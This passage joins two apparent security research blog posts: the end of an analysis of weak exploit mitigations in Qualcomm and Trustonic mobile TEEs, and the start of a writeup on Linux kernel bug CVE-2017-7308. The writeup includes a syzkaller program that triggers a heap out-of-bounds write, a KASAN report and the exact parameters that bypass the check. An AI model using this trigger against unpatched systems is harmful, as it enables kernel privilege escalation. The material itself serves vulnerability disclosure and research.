So what about Qualcomm’s TEE? Well, QSEE does indeed provide a form of ASLR for all trustlets. However, it is far from ideal - in fact, instead of utilising the entire virtual address space, each trustlet’s VAS simply consists of a flat mapping of a small segment of physical memory into which it is loaded.
Indeed, all QSEE trustlets are loaded into the same small physically contiguous range of memory carved out of the device’s main memory. This region (referred to as the “secapp-region” in the device tree) is dedicated to the TEE, and protected against accesses from the “Normal World” by utilising special security hardware on the SoC. Consequently, the larger the “secapp” region, the less memory is available to the “Normal World”.
The “secapp” region commonly spans around 100MB in size. Since, as we’ve noted before, QSEE trustlets’ VAS consists of a flat mapping, the amount of entropy offered by QSEE’s ASLR implementation is limited by the “secapp” region’s size. Therefore, while many devices can theoretically utilise a 64-bit virtual address space (allowing for high-entropy ASLR), the ASLR enabled by QSEE is limited to approximately 9 bits (therefore, with 355 guesses, an attacker would have a 50% chance of correctly guessing the base address). This is further aided by the fact that whenever an illegal access occurs within the TEE, the TEE OS simply crashes the trustlet, allowing the attacker to reload it and attempt to guess the base address once again.

Stack Cookies and Guard Pages
What about other exploit mitigations? Well, one of the most common mitigations is the inclusion of a stack cookie - a unique value which can be used to detect instances of stack smashing and abort the program’s execution.
Analysing the trustlets present on Samsung’s devices and running under Trustonic’s TEE reveals that no such protection is present. As such, every stack buffer overflow in a trusted application can be trivially exploited by an attacker (as we’ve seen above) to gain code execution. This is in contrast to QSEE, whose trustlets include randomised pointer-sized stack cookies.
Lastly, what about protecting the mutable data segments available to each trustlet - such as the stack, heap and globals? Modern operating systems tend to protect these regions by delimiting them with “guard pages”, thus preventing attackers from using an overflow in one structure in order to corrupt the other.
However, Trustonic’s TEE seems to carve both the globals and the stack from the trustlet’s data segment, without providing any guard page in between. Furthermore, the stack is located at the end of the data segment, with the global data structures placed directly before it. This layout makes it easy for an attacker to overflow the stack into the globals, or vice-versa.
Similarly, Qualcomm’s TEE does not provide guard pages between the globals, heap and stack - they are all simply carved out of the single data segment provided to the trustlet. As a result, overflows in any of these data structures can be used to corrupt any of the others.

TEEs As A High Value Target
At this point, it is probably clear that compromising TEEs on Android is a relatively straightforward task. Since both TEEs lag behind in terms of exploit mitigations, the bar for exploiting vulnerabilities, once found, is rather low.
Additionally, as more and more trusted applications are added, finding a vulnerability in the first place is becoming an increasingly straightforward task. Indeed, simply listing the trusted applications present on the Galaxy S8 reveals no fewer than 30 trustlets!

Be that as it may, one might rightly wonder what the possible implications of code-execution within the TEE are. After all, if compromising the TEE does not assist attackers in any way, there may be no reason to further secure it.
To answer this question, we’ll see how compromising the TEE can be an incredibly powerful tool, allowing attackers to fully subvert the system in many cases.
In Qualcomm’s case, one of the system-calls provided by QSEE allows any trustlet to map in physical memory belonging to the “Normal World” as it pleases. As such, this means any compromise of a QSEE trustlet automatically implies a full compromise of Android as well. In fact, such an attack has been demonstrated in the past. Once code execution is gained in the context of a trustlet, it can scan the physical address space for the Linux Kernel, and once found can patch it in memory to introduce a backdoor.
And what of Trustonic’s TEE? Unlike QSEE’s model, trustlets are unable to map-in and modify physical memory. In fact, the security model used by Trustonic ensures that trustlets aren’t capable of doing much at all. Instead, in order to perform any meaningful operation, trustlets must send a request to the appropriate “driver”. This design is conducive to security, as it essentially forces attackers to either compromise the drivers themselves, or find a way to leverage their provided APIs for nefarious means. Moreover, as there aren’t as many drivers as there are trustlets, it would appear that auditing all the drivers in the TEE is indeed feasible.
Although trustlets aren’t granted different sets of “capabilities”, drivers can distinguish between the trusted applications requesting their services by using the caller’s UUID. Essentially, well-written drivers can verify that whichever application consumes their services is contained within a “whitelist”, thus minimising the exposed attack surface.
Sensitive operations, such as mapping-in and modifying physical memory are indeed unavailable to trusted applications. They are, however, available to any driver. As a result, driver authors must be extremely cautious, lest they unintentionally provide a service which can be abused by a trustlet.
Scanning through the drivers provided on Samsung’s Exynos devices, we can see a variety of standard drivers provided by Trustonic, such as the cryptographic driver, the “Trusted UI” driver, and more. However, among these drivers are a few additional drivers authored by Samsung themselves.
One such example is the TIMA driver (UUID FFFFFFFFD0000000000000000000000A), which is used to facilitate Samsung’s TrustZone-based Integrity Measurement Architecture. In short, a component of TIMA performs periodic scans of the kernel’s memory in order to ensure that it is not tampered with.
Samsung has elected to split TIMA’s functionality in two; the driver mentioned above provides the ability to map in physical memory, while an accompanying trusted application consumes these services in order to perform the integrity measurements themselves. In any case, the end result is that the driver provides APIs to both read and write physical memory - a capability which is normally reserved for drivers alone.
Since this functionality could be leveraged by attackers, Samsung has rightly decided to enforce a UUID whitelist in order to prevent access by arbitrary trusted applications. Reversing the driver’s code, we can see that the whitelist of allowed trusted applications is embedded within the driver. Quite surprisingly, however, it is no short list!

Perhaps the take-away here is that having a robust security architecture isn’t helpful unless it is enforced across-the-board. Adding drivers exposing potentially sensitive operations to a large number of trustlets negates these efforts.
Of course, apart from compromising the “Normal World”, the TEE itself holds many pieces of sensitive information which should remain firmly beyond an attacker’s reach. This includes the KeyMaster keys (used for Android’s full disk encryption scheme), DRM content decryption keys (including Widevine) and biometric identifiers.

Afterword
While the motivation behind the inclusion of TEEs in mobile devices is positive, the current implementations are still lacking in many regards. The introduction of new features and the ever-increasing number of trustlets result in a dangerous expansion of the TCB. This, coupled with the current lack of exploit mitigations in comparison to those offered by modern operating systems, makes TEEs a prime target for exploitation.
We’ve also seen that many devices lack support for revocation of trusted applications, or simply fail to do so in practice. As long as this remains the case, flaws in TEEs will be that much more valuable to attackers, as vulnerabilities, once found, compromise the device’s TEE indefinitely.
Lastly, since in many cases TEEs enjoy a privileged vantage point, compromising the TEE may compromise not only the confidentiality of the information processed within it, but also the security of the entire device.


Exploiting the Linux kernel via packet sockets

Google Project Zero - Wed, 05/10/2017 - 12:33
Guest blog post, posted by Andrey Konovalov

Introduction

Lately I’ve been spending some time fuzzing network-related Linux kernel interfaces with syzkaller. Besides the recently discovered vulnerability in DCCP sockets, I also found another one, this time in packet sockets. This post describes how the bug was discovered and how we can exploit it to escalate privileges.
The bug itself (CVE-2017-7308) is a signedness issue, which leads to an exploitable heap-out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with a TPACKET_V3 ring buffer version enabled. As a result the following sanity check in the packet_set_ring() function in net/packet/af_packet.c can be bypassed, which later leads to an out-of-bounds access.
4207                 if (po->tp_version >= TPACKET_V3 &&
4208                     (int)(req->tp_block_size -
4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
4210                         goto out;
The bug was introduced on Aug 19, 2011 in the commit f6fb8f10 ("af-packet: TPACKET_V3 flexible buffer implementation") together with the TPACKET_V3 implementation. There was an attempt to fix it on Aug 15, 2014 in commit dc808110 ("packet: handle too big packets for PACKET_V3") by adding additional checks, but this was not sufficient, as shown below. The bug was fixed in 2b6867c2 ("net/packet: fix overflow in check for priv area size") on Mar 29, 2017.
The bug affects a kernel if it has AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux kernel distributions. Exploitation requires the CAP_NET_RAW privilege to be able to create such sockets. However, it’s possible to do that from a user namespace if they are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.
Since packet sockets are a quite widely used kernel feature, this vulnerability affects a number of popular Linux kernel distributions including Ubuntu and Android. It should be noted that access to AF_PACKET sockets is expressly disallowed to any untrusted code within Android, although it is available to some privileged components. Updated Ubuntu kernels are already out; Android’s update is scheduled for July.

Syzkaller
The bug was found with syzkaller, a coverage guided syscall fuzzer, and KASAN, a dynamic memory error detector. I’m going to provide some details on how syzkaller works and how to use it for fuzzing some kernel interface in case someone decides to try this.
Let’s start with a quick overview of how the syzkaller fuzzer works. Syzkaller is able to generate random programs (sequences of syscalls) based on manually written template descriptions for each syscall. The fuzzer executes these programs and collects code coverage for each of them. Using the coverage information, syzkaller keeps a corpus of programs, which trigger different code paths in the kernel. Whenever a new program triggers a new code path (i.e. gives new coverage), syzkaller adds it to the corpus. Besides generating completely new programs, syzkaller is able to mutate the existing ones from the corpus.
Syzkaller is meant to be used together with dynamic bug detectors like KASAN (detects memory bugs like out-of-bounds and use-after-frees, available upstream since 4.0), KMSAN (detects uses of uninitialized memory, prototype was just released) or KTSAN (detects data races, prototype is available). The idea is that syzkaller stresses the kernel and executes various interesting code paths and the detectors detect and report bugs.
The usual workflow for finding bugs with syzkaller is as follows:
  1. Set up syzkaller and make sure it works. The README and wiki provide quite extensive information on how to do that.
  2. Write template descriptions for a particular kernel interface you want to test.
  3. Specify the syscalls that are used in this interface in the syzkaller config.
  4. Run syzkaller until it finds bugs. Usually this happens quite quickly for interfaces that haven’t been tested with it previously.

Syzkaller uses its own declarative language to describe syscall templates. Check out sys/sys.txt for an example, or sys/ for information on the syntax. Here’s an excerpt from the syzkaller descriptions for AF_PACKET sockets that I used to discover the bug:
resource sock_packet[sock]
define ETH_P_ALL_BE htons(ETH_P_ALL)
socket$packet(domain const[AF_PACKET], type flags[packet_socket_type], proto const[ETH_P_ALL_BE]) sock_packet
packet_socket_type = SOCK_RAW, SOCK_DGRAM
setsockopt$packet_rx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_RX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])
setsockopt$packet_tx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_TX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])
tpacket_req {
 tp_block_size int32
 tp_block_nr int32
 tp_frame_size int32
 tp_frame_nr int32
}
tpacket_req3 {
 tp_block_size int32
 tp_block_nr int32
 tp_frame_size int32
 tp_frame_nr int32
 tp_retire_blk_tov int32
 tp_sizeof_priv int32
 tp_feature_req_word int32
}
tpacket_req_u [
 req tpacket_req
 req3 tpacket_req3
] [varlen]
The syntax is mostly self-explanatory. First, we declare a new type sock_packet. This type is inherited from an existing type sock. That way syzkaller will use syscalls which have arguments of type sock on sock_packet sockets as well.
After that, we declare a new syscall socket$packet. The part before the $ sign tells syzkaller what syscall it should use, and the part after the $ sign is used to differentiate between different kinds of the same syscall. This is particularly useful when dealing with syscalls like ioctl. The socket$packet syscall returns a sock_packet socket.
Then, setsockopt$packet_rx_ring and setsockopt$packet_tx_ring are declared. These syscalls set the PACKET_RX_RING and PACKET_TX_RING socket options on a sock_packet socket. I’ll talk about these options in detail below. Both of them use the tpacket_req_u union as a socket option value. This union has two struct members: tpacket_req and tpacket_req3.
Once the descriptions are added, syzkaller can be instructed to fuzz packet-related syscalls specifically. This is what I provided in the syzkaller manager config:
"enable_syscalls": [ "socket$packet", "socketpair$packet", "accept$packet", "accept4$packet", "bind$packet", "connect$packet", "sendto$packet", "recvfrom$packet", "getsockname$packet", "getpeername$packet", "listen", "setsockopt", "getsockopt", "syz_emit_ethernet" ],
After a few minutes of running syzkaller with these descriptions I started getting kernel crashes. Here’s one of the syzkaller programs that triggered the mentioned bug:
mmap(&(0x7f0000000000/0xc8f000)=nil, (0xc8f000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
r0 = socket$packet(0x11, 0x3, 0x300)
setsockopt$packet_int(r0, 0x107, 0xa, &(0x7f000061f000)=0x2, 0x4)
setsockopt$packet_rx_ring(r0, 0x107, 0x5, &(0x7f0000c8b000)=@req3={0x10000, 0x3, 0x10000, 0x3, 0x4, 0xfffffffffffffffe, 0x5}, 0x1c)
And here’s one of the KASAN reports. It should be noted that since the access is quite far past the block bounds, the allocation and deallocation stacks don’t correspond to the overflowed object.
==================================================================
BUG: KASAN: slab-out-of-bounds in prb_close_block net/packet/af_packet.c:808
Write of size 4 at addr ffff880054b70010 by task syz-executor0/30839

CPU: 0 PID: 30839 Comm: syz-executor0 Not tainted 4.11.0-rc2+ #94
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
Call Trace:
 __dump_stack lib/dump_stack.c:16 [inline]
 dump_stack+0x292/0x398 lib/dump_stack.c:52
 print_address_description+0x73/0x280 mm/kasan/report.c:246
 kasan_report_error mm/kasan/report.c:345 [inline]
 kasan_report.part.3+0x21f/0x310 mm/kasan/report.c:368
 kasan_report mm/kasan/report.c:393 [inline]
 __asan_report_store4_noabort+0x2c/0x30 mm/kasan/report.c:393
 prb_close_block net/packet/af_packet.c:808 [inline]
 prb_retire_current_block+0x6ed/0x820 net/packet/af_packet.c:970
 __packet_lookup_frame_in_block net/packet/af_packet.c:1093 [inline]
 packet_current_rx_frame net/packet/af_packet.c:1122 [inline]
 tpacket_rcv+0x9c1/0x3750 net/packet/af_packet.c:2236
 packet_rcv_fanout+0x527/0x810 net/packet/af_packet.c:1493
 deliver_skb net/core/dev.c:1834 [inline]
 __netif_receive_skb_core+0x1cff/0x3400 net/core/dev.c:4117
 __netif_receive_skb+0x2a/0x170 net/core/dev.c:4244
 netif_receive_skb_internal+0x1d6/0x430 net/core/dev.c:4272
 netif_receive_skb+0xae/0x3b0 net/core/dev.c:4296
 tun_rx_batched.isra.39+0x5e5/0x8c0 drivers/net/tun.c:1155
 tun_get_user+0x100d/0x2e20 drivers/net/tun.c:1327
 tun_chr_write_iter+0xd8/0x190 drivers/net/tun.c:1353
 call_write_iter include/linux/fs.h:1733 [inline]
 new_sync_write fs/read_write.c:497 [inline]
 __vfs_write+0x483/0x760 fs/read_write.c:510
 vfs_write+0x187/0x530 fs/read_write.c:558
 SYSC_write fs/read_write.c:605 [inline]
 SyS_write+0xfb/0x230 fs/read_write.c:597
 entry_SYSCALL_64_fastpath+0x1f/0xc2
RIP: 0033:0x40b031
RSP: 002b:00007faacbc3cb50 EFLAGS: 00000293 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 000000000000002a RCX: 000000000040b031
RDX: 000000000000002a RSI: 0000000020002fd6 RDI: 0000000000000015
RBP: 00000000006e2960 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000708000
R13: 000000000000002a R14: 0000000020002fd6 R15: 0000000000000000

Allocated by task 30534:
 save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59
 save_stack+0x43/0xd0 mm/kasan/kasan.c:513
 set_track mm/kasan/kasan.c:525 [inline]
 kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:617
 kasan_slab_alloc+0x12/0x20 mm/kasan/kasan.c:555
 slab_post_alloc_hook mm/slab.h:456 [inline]
 slab_alloc_node mm/slub.c:2720 [inline]
 slab_alloc mm/slub.c:2728 [inline]
 kmem_cache_alloc+0x1af/0x250 mm/slub.c:2733
 getname_flags+0xcb/0x580 fs/namei.c:137
 getname+0x19/0x20 fs/namei.c:208
 do_sys_open+0x2ff/0x720 fs/open.c:1045
 SYSC_open fs/open.c:1069 [inline]
 SyS_open+0x2d/0x40 fs/open.c:1064
 entry_SYSCALL_64_fastpath+0x1f/0xc2

Freed by task 30534:
 save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59
 save_stack+0x43/0xd0 mm/kasan/kasan.c:513
 set_track mm/kasan/kasan.c:525 [inline]
 kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:590
 slab_free_hook mm/slub.c:1358 [inline]
 slab_free_freelist_hook mm/slub.c:1381 [inline]
 slab_free mm/slub.c:2963 [inline]
 kmem_cache_free+0xb5/0x2d0 mm/slub.c:2985
 putname+0xee/0x130 fs/namei.c:257
 do_sys_open+0x336/0x720 fs/open.c:1060
 SYSC_open fs/open.c:1069 [inline]
 SyS_open+0x2d/0x40 fs/open.c:1064
 entry_SYSCALL_64_fastpath+0x1f/0xc2

Object at ffff880054b70040 belongs to cache names_cache of size 4096
The buggy address belongs to the page:
page:ffffea000152dc00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0
flags: 0x500000000008100(slab|head)
raw: 0500000000008100 0000000000000000 0000000000000000 0000000100070007
raw: ffffea0001549a20 ffffea0001b3cc20 ffff88003eb44f40 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
 ffff880054b6ff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 ffff880054b6ff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>ffff880054b70000: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
                         ^
 ffff880054b70080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff880054b70100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
You can find more details about syzkaller in its repository and more details about KASAN in the kernel documentation. If you decide to try syzkaller or KASAN and run into any trouble, drop an email to the syzkaller or kasan-dev mailing lists.

AF_PACKET sockets
To better understand the bug, the vulnerability it leads to and how to exploit it, we need to understand what AF_PACKET sockets are and how they are implemented in the kernel.
AF_PACKET sockets allow users to send or receive packets on the device driver level. This, for example, lets them implement their own protocol on top of the physical layer, or sniff packets including Ethernet and higher-level protocol headers. To create an AF_PACKET socket a process must have the CAP_NET_RAW capability in the user namespace that governs its network namespace. More details can be found in the packet sockets documentation. It should be noted that if a kernel has unprivileged user namespaces enabled, then an unprivileged user is able to create packet sockets.
To send and receive packets on a packet socket, a process can use the send and recv syscalls. However, packet sockets provide a way to do this faster by using a ring buffer that’s shared between the kernel and userspace. A ring buffer can be created via the PACKET_TX_RING and PACKET_RX_RING socket options. The ring buffer can then be mmapped by the user, and the packet data can be read or written directly to it.
There are a few different variants of the way the ring buffer is handled by the kernel. The variant can be chosen by the user via the PACKET_VERSION socket option. The differences between ring buffer versions can be found in the kernel documentation (search for “TPACKET versions”).
One of the widely known users of AF_PACKET sockets is the tcpdump utility. This is roughly what happens when tcpdump is used to sniff all packets on a particular interface:
# strace tcpdump -i eth0
...
socket(PF_PACKET, SOCK_RAW, 768)        = 3
...
bind(3, {sa_family=AF_PACKET, proto=0x03, if2, pkttype=PACKET_HOST, addr(0)={0, }, 20) = 0
...
setsockopt(3, SOL_PACKET, PACKET_VERSION, [1], 4) = 0
...
setsockopt(3, SOL_PACKET, PACKET_RX_RING, {block_size=131072, block_nr=31, frame_size=65616, frame_nr=31}, 16) = 0
...
mmap(NULL, 4063232, PROT_READ|PROT_WRITE, MAP_SHARED, 3, 0) = 0x7f73a6817000
...
This sequence of syscalls corresponds to the following actions:
  1. A socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)) is created.
  2. The socket is bound to the eth0 interface.
  3. Ring buffer version is set to TPACKET_V2 via the PACKET_VERSION socket option.
  4. A ring buffer is created via the PACKET_RX_RING socket option.
  5. The ring buffer is mmapped in the userspace.

After that the kernel will start putting all packets coming through the eth0 interface in the ring buffer and tcpdump will read them from the mmapped region in the userspace.

Ring buffers
Let’s see how to use ring buffers for packet sockets. For consistency all of the kernel code snippets below will come from the Linux kernel 4.8. This is the version the latest Ubuntu 16.04.2 kernel is based on.
The existing documentation mostly focuses on TPACKET_V1 and TPACKET_V2 ring buffer versions. Since the mentioned bug only affects the TPACKET_V3 version, I’m going to assume that we deal with that particular version for the rest of the post. Also I’m going to mostly focus on PACKET_RX_RING ignoring PACKET_TX_RING.
A ring buffer is a memory region used to store packets. Each packet is stored in a separate frame. Frames are grouped into blocks. In TPACKET_V3 ring buffers frame size is not fixed and can have arbitrary value as long as a frame fits into a block.
To create a TPACKET_V3 ring buffer via the PACKET_RX_RING socket option a user must provide the exact parameters for the ring buffer. These parameters are passed to the setsockopt call via a pointer to a request struct called tpacket_req3, which is defined as:
struct tpacket_req3 {
        unsigned int    tp_block_size;  /* Minimal size of contiguous block */
        unsigned int    tp_block_nr;    /* Number of blocks */
        unsigned int    tp_frame_size;  /* Size of frame */
        unsigned int    tp_frame_nr;    /* Total number of frames */
        unsigned int    tp_retire_blk_tov; /* timeout in msecs */
        unsigned int    tp_sizeof_priv; /* offset to private data area */
        unsigned int    tp_feature_req_word;
};
Here’s what each field means in the tpacket_req3 struct:
  1. tp_block_size - the size of each block.
  2. tp_block_nr - the number of blocks.
  3. tp_frame_size - the size of each frame, ignored for TPACKET_V3.
  4. tp_frame_nr - the number of frames, ignored for TPACKET_V3.
  5. tp_retire_blk_tov - timeout after which a block is retired, even if it’s not fully filled with data (see below).
  6. tp_sizeof_priv - the size of per-block private area. This area can be used by a user to store arbitrary information associated with each block.
  7. tp_feature_req_word - a set of flags (actually just one at the moment), which allows some additional functionality to be enabled.

Each block has an associated header, which is stored at the very beginning of the memory area allocated for the block. The block header struct is called tpacket_block_desc and has a block_status field, which indicates whether the block is currently being used by the kernel or available to the user. The usual workflow is that the kernel stores packets into a block until it’s full and then sets block_status to TP_STATUS_USER. The user then reads required data from the block and releases it back to the kernel by setting block_status to TP_STATUS_KERNEL.
struct tpacket_hdr_v1 {
        __u32   block_status;
        __u32   num_pkts;
        __u32   offset_to_first_pkt;
        ...
};

union tpacket_bd_header_u {
        struct tpacket_hdr_v1 bh1;
};

struct tpacket_block_desc {
        __u32 version;
        __u32 offset_to_priv;
        union tpacket_bd_header_u hdr;
};
Each frame also has an associated header described by the struct tpacket3_hdr. The tp_next_offset field points to the next frame within the same block.
struct tpacket3_hdr {
        __u32 tp_next_offset;
        ...
};
When a block is fully filled with data (a new packet doesn’t fit into the remaining space), it’s closed and released to userspace or “retired” by the kernel. Since the user usually wants to see packets as soon as possible, the kernel can release a block even if it’s not filled with data completely. This is done by setting up a timer that retires current block with a timeout controlled by the tp_retire_blk_tov parameter.
There’s also a way to specify a per-block private area, which the kernel won’t touch and which the user can use to store any information associated with a block. The size of this area is passed via the tp_sizeof_priv parameter.
If you’d like to better understand how a userspace program can use a TPACKET_V3 ring buffer, you can read the example provided in the documentation (search for “TPACKET_V3 example“).

Implementation of AF_PACKET sockets
Let’s take a quick look at how some of this is implemented in the kernel.
Struct definitions
Whenever a packet socket is created, an associated packet_sock struct is allocated in the kernel:
struct packet_sock {
        ...
        struct sock             sk;
        ...
        struct packet_ring_buffer       rx_ring;
        struct packet_ring_buffer       tx_ring;
        ...
        enum tpacket_versions   tp_version;
        ...
        int                     (*xmit)(struct sk_buff *skb);
        ...
};
The tp_version field in this struct holds the ring buffer version, which in our case is set to TPACKET_V3 by a PACKET_VERSION setsockopt call. The rx_ring and tx_ring fields describe the receive and transmit ring buffers in case they are created via PACKET_RX_RING and PACKET_TX_RING setsockopt calls. These two fields have type packet_ring_buffer, which is defined as:
struct packet_ring_buffer {
        struct pgv              *pg_vec;
        ...
        struct tpacket_kbdq_core        prb_bdqc;
};
The pg_vec field is a pointer to an array of pgv structs, each of which holds a reference to a block. Blocks are actually allocated separately, not as one contiguous memory region.
struct pgv {
        char *buffer;
};

The prb_bdqc field is of type tpacket_kbdq_core and its fields describe the current state of the ring buffer:
struct tpacket_kbdq_core {
        ...
        unsigned short  blk_sizeof_priv;
        ...
        char            *nxt_offset;
        ...
        struct timer_list retire_blk_timer;
};
The blk_sizeof_priv field contains the size of the per-block private area. The nxt_offset field points inside the currently active block and shows where the next packet should be saved. The retire_blk_timer field has type timer_list and describes the timer which retires the current block on timeout.
struct timer_list {
        ...
        struct hlist_node       entry;
        unsigned long           expires;
        void                    (*function)(unsigned long);
        unsigned long           data;
        ...
};
Ring buffer setup
The kernel uses the packet_setsockopt() function to handle setting socket options for packet sockets. When the PACKET_VERSION socket option is used, the kernel sets po->tp_version to the provided value.
With the PACKET_RX_RING socket option a receive ring buffer is created. Internally it’s done by the packet_set_ring() function. This function does a lot of things, so I’ll just show the important parts. First, packet_set_ring() performs a bunch of sanity checks on the provided ring buffer parameters:
                err = -EINVAL;
                if (unlikely((int)req->tp_block_size <= 0))
                        goto out;
                if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
                        goto out;
                if (po->tp_version >= TPACKET_V3 &&
                    (int)(req->tp_block_size -
                          BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
                        goto out;
                if (unlikely(req->tp_frame_size < po->tp_hdrlen +
                                        po->tp_reserve))
                        goto out;
                if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
                        goto out;

                rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
                if (unlikely(rb->frames_per_block == 0))
                        goto out;
                if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
                                        req->tp_frame_nr))
                        goto out;
Then, it allocates the ring buffer blocks:
                err = -ENOMEM;
                order = get_order(req->tp_block_size);
                pg_vec = alloc_pg_vec(req, order);
                if (unlikely(!pg_vec))
                        goto out;
It should be noted that alloc_pg_vec() uses the kernel page allocator to allocate blocks (we’ll use this in the exploit):
static char *alloc_one_pg_vec_page(unsigned long order)
{
        ...
        buffer = (char *) __get_free_pages(gfp_flags, order);
        if (buffer)
                return buffer;
        ...
}

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
        ...
        for (i = 0; i < block_nr; i++) {
                pg_vec[i].buffer = alloc_one_pg_vec_page(order);
                ...
        }
        ...
}
Finally, packet_set_ring() calls init_prb_bdqc(), which performs some additional steps to set up a TPACKET_V3 receive ring buffer specifically:
                switch (po->tp_version) {
                case TPACKET_V3:
                        ...
                        if (!tx_ring)
                                init_prb_bdqc(po, rb, pg_vec, req_u);
                        break;
                default:
                        break;
                }
The init_prb_bdqc() function copies provided ring buffer parameters to the prb_bdqc field of the ring buffer struct, calculates some other parameters based on them, sets up the block retire timer and calls prb_open_block() to initialize the first block:
static void init_prb_bdqc(struct packet_sock *po,
                        struct packet_ring_buffer *rb,
                        struct pgv *pg_vec,
                        union tpacket_req_u *req_u)
{
        struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
        struct tpacket_block_desc *pbd;
        ...
        pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
        p1->pkblk_start = pg_vec[0].buffer;
        p1->kblk_size = req_u->req3.tp_block_size;
        ...
        p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;

        p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
        prb_init_ft_ops(p1, req_u);
        prb_setup_retire_blk_timer(po);
        prb_open_block(p1, pbd);
}
One of the things the prb_open_block() function does is set the nxt_offset field of the tpacket_kbdq_core struct to point right after the per-block private area:
static void prb_open_block(struct tpacket_kbdq_core *pkc1,
        struct tpacket_block_desc *pbd1)
{
        ...
        pkc1->pkblk_start = (char *)pbd1;
        pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
        ...
}
Packet reception
Whenever a new packet is received, the kernel is supposed to save it into the ring buffer. The key function here is __packet_lookup_frame_in_block(), which does the following:
  1. Checks whether the currently active block has enough space for the packet.
  2. If yes, saves the packet to the current block and returns.
  3. If no, dispatches the next block and saves the packet there.

static void *__packet_lookup_frame_in_block(struct packet_sock *po,
                                            struct sk_buff *skb,
                                            int status,
                                            unsigned int len
                                            )
{
        struct tpacket_kbdq_core *pkc;
        struct tpacket_block_desc *pbd;
        char *curr, *end;

        pkc = GET_PBDQC_FROM_RB(&po->rx_ring);
        pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
        ...
        curr = pkc->nxt_offset;
        pkc->skb = skb;
        end = (char *)pbd + pkc->kblk_size;

        /* first try the current block */
        if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {
                prb_fill_curr_block(curr, pkc, pbd, len);
                return (void *)curr;
        }

        /* Ok, close the current block */
        prb_retire_current_block(pkc, po, 0);

        /* Now, try to dispatch the next block */
        curr = (char *)prb_dispatch_next_block(pkc, po);
        if (curr) {
                pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
                prb_fill_curr_block(curr, pkc, pbd, len);
                return (void *)curr;
        }
        ...
}

Vulnerability
Let’s look closely at the following check from packet_set_ring():
                if (po->tp_version >= TPACKET_V3 &&
                    (int)(req->tp_block_size -
                          BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
                        goto out;
This is supposed to ensure that the length of the block header together with the per-block private data is not bigger than the size of the block, which totally makes sense: otherwise we won’t have enough space in the block for them, let alone the packet data.
However, it turns out this check can be bypassed. If req_u->req3.tp_sizeof_priv has its high bit set, casting the expression to int results in a big positive value instead of a negative one. To illustrate this behavior:
A = req->tp_block_size = 4096 = 0x1000
B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int)0x7fffffd0 = 0x7fffffd0 > 0
Later, when req_u->req3.tp_sizeof_priv is copied to p1->blk_sizeof_priv in init_prb_bdqc() (see the snippet above), it’s truncated to its two lower bytes, since the type of the latter is unsigned short. So this bug basically allows us to set the blk_sizeof_priv field of the tpacket_kbdq_core struct to an arbitrary value, bypassing all sanity checks.
If we search through the net/packet/af_packet.c source looking for blk_sizeof_priv usage, we’ll find that it’s being used in the two following places.
The first one is in init_prb_bdqc() right after it gets assigned (see the code snippet above) to set max_frame_len. The value of p1->max_frame_len denotes the maximum size of a frame that can be saved into a block. Since we control p1->blk_sizeof_priv, we can make BLK_PLUS_PRIV(p1->blk_sizeof_priv) bigger than p1->kblk_size. This will result in p1->max_frame_len having a huge value, higher than the size of a block. This allows us to bypass the size check when a frame is being copied into a block, thus causing a kernel heap out-of-bounds write.
That’s not all. Another user of blk_sizeof_priv is prb_open_block(), which initializes a block (the code snippet is above as well). There pkc1->nxt_offset denotes the address where the kernel will write a new packet when it’s received. The kernel doesn’t intend to overwrite the block header and per-block private data, so it makes this address point right after them. Since we control blk_sizeof_priv, we can control the lowest two bytes of nxt_offset. This allows us to control the offset of the out-of-bounds write.
To sum up, this bug leads to a kernel heap out-of-bounds write of controlled maximum size and controlled offset up to about 64k bytes.

Exploitation
